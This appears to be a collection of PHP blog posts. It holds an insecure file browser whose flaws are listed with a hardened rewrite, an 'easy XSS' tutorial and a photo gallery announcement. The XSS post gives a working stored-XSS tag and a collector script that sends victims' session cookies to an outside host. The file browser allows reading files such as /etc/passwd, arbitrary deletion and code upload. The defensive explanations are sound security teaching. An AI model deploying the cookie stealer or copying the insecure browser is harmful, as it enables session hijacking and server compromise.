
A 20-row file browser / FTP-client-like script in PHP

Here is an example of a minimal file browser script that behaves like a remote FTP client: you can browse directories, download files, delete them and upload new ones.

<?php
// p = path to show: a file is sent as a download, a directory becomes the current dir
if(isset($_GET['p']) && $_GET['p'])
    if(is_file($_GET['p'])){
        header('Content-Disposition: attachment; filename="'.basename($_GET['p']).'"');
        die(file_get_contents($_GET['p']));
    }else
        chdir(realpath($_GET['p']));
$base_path=getcwd().DIRECTORY_SEPARATOR;
// f = uploaded file, stored in the current dir under the name the client sent
if(isset($_FILES['f']['tmp_name']) && $_FILES['f']['tmp_name'])
    move_uploaded_file($_FILES['f']['tmp_name'], $base_path.$_FILES['f']['name']);
// d = name of a file in the current dir to delete
if(isset($_GET['d']) && is_file($base_path.$_GET['d']))
    unlink($base_path.$_GET['d']);
$files=scandir($base_path);
$html_list='';
$dir=urlencode($base_path);
foreach($files as $file){
    $p=urlencode($base_path.$file);
    // the delete link passes the directory as p: a file path in p would hit the
    // download branch above and die() before unlink is ever reached
    $html_list.="<li><a href=\"?p=".$p."\">$file</a> ".((is_file($base_path.$file))?"| <a href=\"?p=$dir&d=".urlencode($file)."\">delete</a>":"")."</li>";
}
$form_upload='<form action="" method="POST" enctype="multipart/form-data"><input type="file" name="f" /><input type="submit" /></form>';
echo "<h1>".getcwd()."</h1>$form_upload<ul>$html_list</ul>";

And here is a screenshot:

Be warned: this script is not production ready. It is only an experiment to demonstrate the minimum work needed for a complete file browser, and putting it on a public website would be dangerous. Read it again with an attacker's eyes: p is used as a path with no restriction at all, so any file the web server user can read can be downloaded and any directory browsed (?p=/etc/passwd); d is joined to the current directory without checking for ../, so files outside it can be deleted as well; uploads are stored under the client-supplied name, so a .php file dropped inside the document root becomes executable code; delete works over a plain GET link with no token, so a link on any other page can trigger it; and directory and file names are printed without HTML escaping.
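Below is an added example, not the original 20-row script and not code from the post's author: the same browse, download, upload and delete features, with every user-supplied path confined to one root directory, the state-changing actions moved to POST behind a CSRF token, and all output HTML-escaped. It assumes a directory named files next to the script as the shared area (a name chosen for the example), PHP 7.3 or later, and that files is served from a location where PHP does not execute, since an uploaded .php file is still code wherever it lands.

```php
<?php
// Added example (not the original script): the same features with user-supplied
// paths confined to $root, writes behind POST + CSRF token, output escaped.
// Assumptions: ./files exists next to this script and is the shared area;
// PHP 7.3+; ./files is served from a location where PHP is not executed.

// Resolve a user-supplied relative path inside $root; null if it escapes.
function safe_path(string $root, string $rel): ?string {
    if ($rel === '' || $rel === '.') {
        return $root;
    }
    if (strpos($rel, "\0") !== false || $rel[0] === '/' || $rel[0] === '\\') {
        return null;                             // NUL bytes, absolute paths
    }
    $real = realpath($root . '/' . $rel);        // collapses ../ and symlinks
    if ($real === false) {
        return null;                             // nothing there
    }
    $prefix = $root . DIRECTORY_SEPARATOR;
    if ($real !== $root && strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;                             // resolved outside $root
    }
    return $real;
}
// Reduce an upload or delete target to one conservative file name.
function safe_name(string $name): ?string {
    $name = basename(str_replace('\\', '/', $name));
    return preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$/', $name) ? $name : null;
}
// Path relative to $root, used in links ('' is the root itself).
function rel_path(string $root, string $abs): string {
    return $abs === $root ? '' : substr($abs, strlen($root) + 1);
}
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}
// A POST form carrying the CSRF token; $inner is trusted markup built below.
function action_form(string $here, string $token, string $inner): string {
    return '<form method="post" action="?p=' . $here . '" enctype="multipart/form-data">'
         . '<input type="hidden" name="csrf" value="' . h($token) . '">' . $inner . '</form>';
}

session_start();
$_SESSION['csrf'] = $_SESSION['csrf'] ?? bin2hex(random_bytes(16));
$root = realpath(__DIR__ . '/files') or exit('create ./files next to this script');
$cwd = safe_path($root, (string)($_GET['p'] ?? ''));
if ($cwd === null) {
    http_response_code(400);                     // ../ or absolute path in p
    exit('invalid path');
}
if (is_file($cwd)) {                             // download
    header('Content-Type: application/octet-stream');
    header("Content-Disposition: attachment; filename*=UTF-8''" . rawurlencode(basename($cwd)));
    readfile($cwd);
    exit;
}
$here = rawurlencode(rel_path($root, $cwd));
if ($_SERVER['REQUEST_METHOD'] === 'POST') {     // upload or delete
    if (!hash_equals($_SESSION['csrf'], (string)($_POST['csrf'] ?? ''))) {
        http_response_code(403);
        exit('bad token');
    }
    if (isset($_FILES['f']['tmp_name']) && is_uploaded_file($_FILES['f']['tmp_name'])) {
        $name = safe_name((string)$_FILES['f']['name']);
        if ($name !== null) {
            move_uploaded_file($_FILES['f']['tmp_name'], $cwd . '/' . $name);
        }
    } elseif (isset($_POST['d'])) {
        $name = safe_name((string)$_POST['d']);
        if ($name !== null && is_file($cwd . '/' . $name)) {
            unlink($cwd . '/' . $name);
        }
    }
    header('Location: ?p=' . $here);             // redirect so a reload does not repeat it
    exit;
}
$list = '';
foreach (scandir($cwd) as $f) {
    if ($f === '.' || ($f === '..' && $cwd === $root)) {
        continue;                                // never link above the root
    }
    $link = rel_path($root, $cwd) === '' ? $f : rel_path($root, $cwd) . '/' . $f;
    $list .= '<li><a href="?p=' . rawurlencode($link) . '">' . h($f) . '</a>';
    if (is_file($cwd . '/' . $f)) {
        $list .= ' ' . action_form($here, $_SESSION['csrf'],
            '<input type="hidden" name="d" value="' . h($f) . '"><button>delete</button>');
    }
    $list .= '</li>';
}
echo '<h1>/' . h(rel_path($root, $cwd)) . '</h1>'
   . action_form($here, $_SESSION['csrf'], '<input type="file" name="f"><input type="submit">')
   . '<ul>' . $list . '</ul>';
```

To try it, create the files directory with a few subfolders next to the script, run php -S 127.0.0.1:8080 in that directory and open http://127.0.0.1:8080/ in a browser. Requests such as ?p=../../etc/passwd or ?p=%2Fetc%2Fpasswd now get a 400 instead of a download, because realpath() resolves the path first and the prefix check rejects anything that did not stay under the root. The prefix comparison includes the trailing separator on purpose: without it, a sibling directory named files2 would pass as being inside files.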

JavaScript hack – an easy XSS example

There are countless cross-site scripting (XSS) tricks. This post shows one common and easy type: stored XSS used to steal session cookies.

The first step is to insert a JavaScript include tag into a page of a shared web service where users can publish content (a profile page, a comment, a forum post):

<script language="javascript" src="http://yoursite.com/cookiejar.php"></script>

Second, put a script at http://yoursite.com/cookiejar.php (a host you control) with the following code. It has two jobs: loaded by the script tag above, it returns the JavaScript that reads document.cookie inside the victim page; called back by that JavaScript with ?c=..., it logs the value:

<?php
// Collector on the attacker's host.
// Called with ?c=<cookies>: append them to cookiejar.txt.
// Called without: serve the JavaScript that the injected <script src> tag loads.
if(isset($_GET['c'])){
    file_put_contents('cookiejar.txt',
                      $_GET['c']."\n",
                      FILE_APPEND);
    die();
}
header('Content-Type: application/javascript');
?>
new Image().src='http://yoursite.com/cookiejar.php?c='+encodeURIComponent(document.cookie);

If the website lets you post raw HTML, every user who views the page carrying your tag runs that JavaScript in the website's own origin, and after a while cookiejar.txt holds their cookies. The detour through document.cookie is not optional: cookies are scoped to the site that set them, so when the browser fetches cookiejar.php from yoursite.com it sends only yoursite.com's cookies, and reading $_COOKIE on your server would never show the target site's session. The script has to read document.cookie while running inside the victim page and ship the value across. Cookies set with the HttpOnly flag are invisible to document.cookie and survive this particular trick, although injected script can still act on the user's behalf from inside the page.

So never trust user-generated content. The easiest way to avoid XSS is to use a mature web framework such as Django, Rails or Symfony, whose templates escape output by default. If you write your own code, remember that the defence belongs on output, not on input: escape every user-supplied value for the context it is inserted into (htmlspecialchars with ENT_QUOTES for HTML), rather than just stripping tags, which is routinely bypassed; URL encoding is for URLs, not for HTML. As a second line of defence, set session cookies HttpOnly so script cannot read them, and add a Content-Security-Policy that blocks inline and third-party scripts.
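The following added example (not code from the original post) renders the post's payload the vulnerable way and the escaped way, and shows why strip_tags() is not a fix when user input lands inside an attribute. The function names, the "comment" and "nickname" inputs, and the hardened-session helper are constructed for the demo; it assumes PHP 7.3 or later.

```php
<?php
// Added example, not code from the original post: the payload from the post
// rendered unsafely and escaped, plus the attribute case strip_tags() misses.
// Run from the command line: php xss_demo.php   (PHP 7.3+)
// The sample inputs below are constructed for the demo.

// What an attacker posts as a "comment" (the tag from the post).
const PAYLOAD = '<script language="javascript" src="http://yoursite.com/cookiejar.php"></script>';
// What an attacker posts as a "nickname" that ends up inside value="...".
const ATTR_PAYLOAD = '" onfocus="alert(document.cookie)" autofocus="';

// Vulnerable: the comment is dropped into the page verbatim.
function render_unsafe(string $comment): string {
    return "<li>$comment</li>";
}

// Fixed: escape on output, for the HTML context. ENT_QUOTES also turns
// quotes into entities, so the same helper is safe inside attributes.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}
function render_safe(string $comment): string {
    return '<li>' . h($comment) . '</li>';
}

// Still vulnerable: strip_tags() removes <...>, but this payload has no tag;
// its bare " closes the attribute and the rest becomes an event handler.
function render_attr_stripped(string $nick): string {
    return '<input name="nick" value="' . strip_tags($nick) . '">';
}
function render_attr_safe(string $nick): string {
    return '<input name="nick" value="' . h($nick) . '">';
}

// Defence in depth for the cookie itself: HttpOnly keeps it out of
// document.cookie, Secure keeps it off plain HTTP. Call before any output.
function start_hardened_session(): void {
    session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
    session_start();
}

if (PHP_SAPI === 'cli') {
    echo render_unsafe(PAYLOAD), "\n";             // <script ...> reaches the browser
    echo render_safe(PAYLOAD), "\n";               // &lt;script ...&gt; is shown as text
    echo render_attr_stripped(ATTR_PAYLOAD), "\n"; // onfocus handler survives strip_tags
    echo render_attr_safe(ATTR_PAYLOAD), "\n";     // &quot; keeps it inside the value
}
```

The third line of output is the one to look at: strip_tags() returned the nickname unchanged because it contains no angle brackets, yet the browser would parse the result as an input with an onfocus handler that fires immediately thanks to autofocus. Escaping for the context where the value is inserted is the fix; input filtering alone is not.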

PHP photo gallery all in one

You have a lot of images and don't want Flickr or a big framework (e.g. zenphoto) to show them; you just want to put your image folders on a server over FTP and show them to the world. Easy as 1-2-3: Mininim album can be a one-shot solution.

I wrote it several years ago and now I have decided to dust it off and share it, because a lot of friends ask me for a simple solution to have a nice web gallery of their holiday pictures or a simple photo portfolio.

This script requires only a Linux server and PHP (4 or 5) with, obviously, the GD library enabled. You don't have to worry about these requirements: the simplest thing you can do is put the file on your server and open the page in the browser. If something goes wrong, you will see an error ;)

The install process is simple, because there isn't one :)
Download the file from the repository and put the "index.php" file on the server. In the same directory put your image folders.

Ex.:

$ hg clone https://ifabio@bitbucket.org/ifabio/mininim-album/

You can also download the file from the repository as zip.

Use your FTP client (Cyberduck or FileZilla) to upload the file and your images. Remember to always put the images in a separate folder.

Enjoy! You can see a live demo at album.mininim.org

Report a bug.